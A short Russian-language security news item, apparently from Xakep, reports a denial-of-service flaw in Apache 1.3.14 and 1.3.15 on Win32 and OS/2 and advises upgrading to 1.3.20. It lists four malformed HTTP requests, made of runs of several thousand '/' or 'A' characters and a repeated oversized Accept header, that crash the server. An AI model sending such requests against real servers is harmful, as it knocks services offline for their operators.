Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Правильно построенная конструкция URL может вывести из строя Apache сервер на платформах WIN32 и OS2. Дыра работает на версиях 1.3.14, 1.3.15, на версии 1.3.20 не работает.
Пример:
1) GET (a string of 8184 "/") /
2) HEAD /(a string of 8182 "A") /
3) GET (a string of 8184 "/") /
for 100 times:
Accept: (8182 of "/")
4) GET (a string of 8177 "/") HTTP/1.0
Для устранения ошибки скачайте версию 1.3.20: